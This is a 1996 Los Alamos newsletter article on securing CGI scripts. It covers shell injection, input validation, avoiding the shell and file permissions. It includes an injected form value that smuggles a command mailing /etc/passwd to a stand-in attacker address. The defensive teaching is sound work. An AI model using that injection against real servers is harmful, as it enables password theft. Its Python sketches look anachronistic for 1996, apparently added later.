CGI Security
March 1996 BITS: computing and communications news
The Common Gateway Interface (CGI) is what, for now at least,
makes the World Wide Web interactive. CGI enables users to do
more than simply read static files; it enables them to perform
tasks such as searching for information, filling out and
submitting forms, and more.
This capability makes the Web a far more useful place and
has been widely adopted by the Internet community. Throughout
the universities, laboratories, companies, and other
organizations that make up the Web, CGI scripts are
developed, refined, shared--and sometimes compromised.
For the Laboratory, too, CGI is a widely used tool.
As always, and especially at an institution such as
the Laboratory, whenever you allow somebody to execute tasks
on your machine, you're opening a potential security hole
and you need to make sure it's adequately plugged.
The Mechanism
Basically, there are two parts to a CGI "script": an executable
(the script itself) and an HTML page that drives the executable.
The executable can be just about anything that runs, including
system calls, Perl scripts, shell scripts, and compiled programs
(C, Pascal, etc.).
The HTML page is actually optional. CGI scripts can be used
without user input to increment page counters, display the day
and date, etc. If the user is to enter any information, however,
the HTML page is needed.
When both parts are properly constructed, the CGI action is
performed as follows (as illustrated by a form submission):
- The user pulls the HTML form page from the server onto his/her
client machine (see Figure 1).
- The user fills out the form on the client machine.
- The user presses "Submit", which then sends an execute request
to the server. (The client-side browser interprets the
form into an execute request, which identifies the server-side
program and includes the information that was filled into
the form.)
- The server executes the requested program.

Figure 1: CGI Execution Cycle
The same basic process occurs for other CGI scripts that accept
user input. A clickable imagemap, for example, sends the image to
the client machine and issues an execute request that specifies
which part of the image was clicked on.
The fundamental strength of CGI is its simplicity. Entering
information on the form and all other manipulation is performed on the client
machine, so the server doesn't have to worry about it. All that
the server has to do is to execute the request when it is issued.
Therein also lies the fundamental security weakness within CGI.
Because the HTML page itself is transferred to the client
machine, the user has an unrestricted ability to edit the page at
will and to enter whatever he/she pleases. The execute request
might easily be a good deal different from what you expect.
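To make the point concrete, here is a minimal sketch, in Python rather than the Perl used elsewhere in this article, of what travels from client to server. It relies only on the standard urllib.parse module; the helper name server_side_fields is hypothetical, and the field name send_to is borrowed from the e-mail example discussed in the next section.

```python
from urllib.parse import urlencode, parse_qs

# What the unmodified form would send: one of the values offered on the page.
expected_request = urlencode({"send_to": "aarkin@lanl.gov"})

# What an edited copy of the form can send: any string the user likes.
tampered_request = urlencode(
    {"send_to": "aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd"}
)

def server_side_fields(query_string):
    """Decode a submitted query string the way a CGI program would see it."""
    return {name: values[0] for name, values in parse_qs(query_string).items()}

print(expected_request)
print(server_side_fields(expected_request)["send_to"])
print(server_side_fields(tampered_request)["send_to"])
```

Both requests decode without complaint. Nothing in the request itself tells the server whether the value came from the original page or from an edited copy.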
A Simple Shell Breach
The most commonly cited examples of CGI security breaches involve
cajoling the shell into performing something unexpected. For instance,
let's say we want a form that lets a user e-mail a message to a
specified person. In our HTML form page, we might write something
like the following:
<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov">Alan Arkin<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="lball@lanl.gov">Lucille Ball<br>
<INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns
Now let's say we execute a script that writes the message to a
temporary file and then e-mails that file to the selected address.
In Perl, this could be done with
system("/usr/lib/sendmail -t $send_to < $temp_file");
As long as the user selects from the addresses that are given,
everything will work fine. There is, however, no way to guarantee that.
Because the HTML form itself has been transferred to the user's
client machine, he/she is free to edit it to read something like
<INPUT TYPE="radio" NAME="send_to"
VALUE="aarkin@lanl.gov;mail badguy@evil-empire.org </etc/passwd">
Alan Arkin<br>
As soon as this gets sent, the shell will end the original sendmail
command at the semicolon and then execute the next
command--which would mail the password file to the user, who
could then try to crack the encrypted passwords in it and use them
to gain login access to your machine.
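The effect of the semicolon can be reproduced harmlessly. The following is a minimal sketch in Python (not the article's Perl), assuming a POSIX shell is available. The echo command stands in for sendmail so that nothing is mailed, and the function name run_through_shell is hypothetical.

```python
import subprocess

def run_through_shell(send_to):
    """Interpolate send_to into a command string and hand it to the shell."""
    # echo stands in for sendmail so that nothing is actually mailed.
    command = f"echo delivering to {send_to}"
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()

honest = run_through_shell("aarkin@lanl.gov")
tampered = run_through_shell("aarkin@lanl.gov; echo SECOND COMMAND RAN")

print(honest)    # one line of output: the intended command
print(tampered)  # two lines: the shell also ran what followed the semicolon
```

The tampered value produces output from two separate commands, which is exactly the behavior the edited form exploits.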
Other Breaches
The above example is not the only thing that can go wrong. Aside
from capturing a password file, malicious users can also exploit
poorly defended CGI to
- Access other sensitive files;
- Install and execute their own programs on your system
(including "Trojan Horses" that monitor system activity and
report back to the user);
- Install other viruses; or
- Gain an overall map of your filesystem in order to search for
potential weaknesses.
Also, not all of the weaknesses are at the system level (and UNIX
isn't the only vulnerable operating system). Other
vulnerabilities that have been identified include the following:
- Certain mail programs treat a line that begins with ~ as an
escape that can execute arbitrary programs.
- Server-side includes have been tricked into executing commands
embedded within HTML comments in the input.
- C programs that "forgot" array boundaries have been tricked
into executing programs via very long input.
- Some early sendmail programs allowed any user to execute
arbitrary programs.
This is by no means a complete list. More breaches have been
identified; others have been invented but not yet identified;
still others have not yet been invented.
The basic point, however, remains the same: CGI should always be
used with caution.
How to Make Your CGI Secure
As with other areas of computer security, the basic idea behind
securing CGI is to understand the demonstrated and potential
threats, to counter these threats, and to monitor system activity
for unusual events.
Start with an adequately secured server. This includes
appropriate screening at the router, turning off un-needed
daemons, creating a non-privileged WWW user and group,
and restricting the file system. Additional precautions may be
required, depending upon the
partition in which you are working, who the intended audience is, and
the sensitivity level of the data on the machine. These precautions
include monitoring who
accesses the scripts and the other activities those users perform,
and consulting with your computer security officer as needed.
Beyond the basics, there are other methods of improving CGI
security.
Never Accept Unchecked Input
Always check for special characters such as ";" before you open a
shell. You can do this either by restricting the input you accept
or by escaping any dangerous characters. In Perl, for example,
the following line escapes dangerous UNIX shell characters within
a variable:
$var =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
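For readers who want to experiment with the escaping approach, here is a rough Python counterpart, offered as a sketch rather than a vetted filter. The character set is an assumption modeled on the Perl line (it includes &, which the shell treats as a command separator), and the names SHELL_SPECIALS and escape_shell_specials are hypothetical.

```python
import re

# Shell metacharacters to neutralize; the set is an assumption modeled on
# the Perl substitution and may not be complete for every shell.
SHELL_SPECIALS = re.compile(r"""([;<>*|`&$!#()\[\]{}:'"])""")

def escape_shell_specials(value):
    """Put a backslash in front of each listed shell metacharacter."""
    return SHELL_SPECIALS.sub(r"\\\1", value)

print(escape_shell_specials("aarkin@lanl.gov;mail badguy@evil-empire.org"))
```

Python's standard library also provides shlex.quote, which quotes a whole string for use as a single shell argument. Either way, restricting input to known-good values is usually easier to get right than trying to list every dangerous character.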
Among the other things to check:
- For server-side includes, check for "<" and ">" in order to
identify and validate any embedded HTML tags.
- For scripts that utilize e-mail, validate that the addresses are
within an acceptable domain (e.g., make sure they're
"@lanl.gov").
- Look for any occurrence of "/../" (which might indicate that
the user is attempting to access higher levels of the directory
structure).
- For selection lists, check to make sure that the value sent is
a valid choice.
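The checks in this list are simple to express in code. The following Python sketch (again, not the article's Perl) shows one possible shape for them. All function names and the address pattern are hypothetical, and the list of valid recipients is taken from the e-mail form example earlier in this article.

```python
import re

# Values offered by the form in the e-mail example; anything else is rejected.
VALID_RECIPIENTS = {"aarkin@lanl.gov", "lball@lanl.gov", "gburns@lanl.gov"}

# Assumed address pattern: a conservative local part followed by the domain.
LANL_ADDRESS = re.compile(r"[A-Za-z0-9._-]+@lanl\.gov")

def is_valid_choice(value):
    """Selection lists: accept only values the form actually offered."""
    return value in VALID_RECIPIENTS

def is_lanl_address(address):
    """E-mail scripts: the whole string must be an address in the domain."""
    return LANL_ADDRESS.fullmatch(address) is not None

def climbs_directories(path):
    """Paths: flag any '..' component, which covers '/../'."""
    return ".." in path.split("/")

def contains_markup(text):
    """Server-side includes: flag input that carries '<' or '>'."""
    return "<" in text or ">" in text
```

Note that each check decides what to accept, or flags a specific pattern for rejection, before the input reaches a shell, a mail program, or the filesystem.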
Prefer Compiled Programs to Interpreted Scripts
This is a very general guideline, by no means an ironclad "rule."
The basic idea is that a compiled program (e.g., a binary executable
from C) is more
difficult to make sense of if a user is able to get a copy of it.
This in turn makes it more difficult for the user to search for
potential weaknesses within the program.
Counterbalancing this general preference are the facts that an interpreted program
(e.g., Perl) is generally easier for the programmer to understand
(including whoever has to support the program after it is
written) and easier to test (no need to compile before each
test). Hence, even though the compiled programs are generally
preferred, there are many specific cases where the interpreted
program is perfectly acceptable.
Avoid the Shell
Again, this is a very general guideline--more of a caution than a
rule. There is nothing inherently wrong with opening a shell,
provided that the security implications are understood and
addressed. Frequently, though, it is easier to sidestep the shell
concerns and call a program directly.
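In UNIX/Perl, for example, a shell can be opened by system, exec,
backticks, and piped opens whenever the command string contains shell
metacharacters. (eval does not open a shell, but it runs arbitrary
Perl code and deserves the same caution.) Hence, the basic weakness of
the following line (taken from the above example) stems from the fact
that it hands the whole command string, user input included, to a shell: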
system("/usr/lib/sendmail -t $send_to < $temp_file");
A construction like the following sidesteps this weakness by
calling sendmail directly:
open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "To: $send_to\n";
print MAIL "$input_line_1";
...etc.
close(MAIL);
Keep in mind, however, that when you call a program directly you
are in a sense trading the known security vulnerabilities of the
shell for the potentially unknown vulnerabilities of the program.
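The same idea can be sketched in Python (not the article's Perl): when a program is started from an argument list with no shell involved, a semicolon in the input is just another character. In this sketch a small Python child process stands in for sendmail and simply prints the argument it receives. The function name run_without_shell is hypothetical.

```python
import subprocess
import sys

def run_without_shell(send_to):
    """Pass send_to as a single argument; no shell ever parses it."""
    # A tiny Python child process stands in for sendmail and echoes
    # back the one argument it was given.
    child = [sys.executable, "-c", "import sys; print(sys.argv[1])", send_to]
    result = subprocess.run(child, capture_output=True, text=True)
    return result.stdout.rstrip("\n")

print(run_without_shell("aarkin@lanl.gov; echo SECOND COMMAND RAN"))
```

The child receives the whole string, semicolon included, as one argument, and no second command runs. What the called program then does with that string is a separate question, as the caution above points out.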
Control Filesystem Permissions
Users need to execute CGI scripts, but there is no reason for
them to have read or write permissions. Similarly, users need to
read the HTML driver files (and to read and execute their
directory), but there is no need for them to have write or
execute permission to the files (or write permission to their
directory).
These controls are most easily maintained as follows:
- Put scripts in a separate directory and set permissions for the
directory and its files to rwx--x--x (or the equivalent).
- If you are using compiled programs, put the source in a
different directory from the compiled programs (to prevent
users from "guessing" their name and accessing the source).
- Do not leave old or not-yet-validated versions of scripts in
the active scripts directory (including the filename~ backups
that Emacs automatically makes).
- Restrict permissions for HTML files to rw-r--r-- and for their
directories to rwxr-xr-x (or the equivalents).
- If the CGI output will be written to a file, put that file in a
separate directory, assign that directory's ownership to the
non-privileged WWW user, and set (umask) the permissions to
rw------- for the file and rwx------ for the directory.
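As an illustration, the permission settings listed above can be applied and checked with a few lines of Python on a UNIX system. This is a sketch under stated assumptions: the directory and file names (cgi-bin, mailform, and so on) are hypothetical, everything is created under a scratch directory, and ownership by the non-privileged WWW user is not handled here.

```python
import os
import stat
import tempfile

def mode_string(path):
    """Return the permissions of path in ls style, e.g. '-rw-r--r--'."""
    return stat.filemode(os.stat(path).st_mode)

def build_layout(root):
    """Create three example directories, one file in each, and set modes."""
    layout = {
        # directory: (directory mode, example file, file mode)
        "cgi-bin": (0o711, "mailform", 0o711),            # rwx--x--x
        "html": (0o755, "mailform.html", 0o644),          # rwxr-xr-x / rw-r--r--
        "cgi-output": (0o700, "messages.log", 0o600),     # rwx------ / rw-------
    }
    modes = {}
    for dirname, (dir_mode, filename, file_mode) in layout.items():
        dirpath = os.path.join(root, dirname)
        os.mkdir(dirpath)
        filepath = os.path.join(dirpath, filename)
        with open(filepath, "w") as handle:
            handle.write("placeholder\n")
        os.chmod(filepath, file_mode)
        os.chmod(dirpath, dir_mode)
        modes[dirname] = (mode_string(dirpath), mode_string(filepath))
    return modes

for name, (dir_mode, file_mode) in build_layout(tempfile.mkdtemp()).items():
    print(name, dir_mode, file_mode)
```

Setting the modes explicitly with chmod, rather than relying on umask alone, makes the result independent of whatever umask the process happens to inherit.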
Validate Scripts from the Web
There are many CGI scripts freely available on the Web. While
these can often serve as a good starting point, many of them
come from university environments that do not have the same
security concerns as the Laboratory. A number have been
demonstrated to contain security holes, and some have even
been found to contain Trojan Horses.
Any time you "borrow" a free script as a starting point,
make sure to validate it for security. Check it as outlined
above, and modify it as needed. Above all, don't run anything
that contains any lines you don't understand. Don't even test
it until you've figured it out--there's no telling what it
might do.
Additional Information
As CGI programming has become more popular, the amount of
information about it and about CGI security has grown. Good sources of information
(including the sources of some of the above suggestions) include
the following:
Links to these and other security resources are available from
the Information Architecture's Internet/WWW Subject Area web
space--
http://www.lanl.gov/projects/ia-lanl/area/web/
For further information about the Information Architecture
project itself, see
http://www.lanl.gov/projects/ia/
Or look under "What's New" from the Laboratory home page.
Tad Lane, tad@lanl.gov, (505) 667-0886
Information Architecture Standards Editor
Communications Arts and Services (CIC-1)
ia-std-editor@lanl.gov -
Copyright © 1996 UC -
March 12, 1996
Unlimited release - LALP-96-11 (2/96)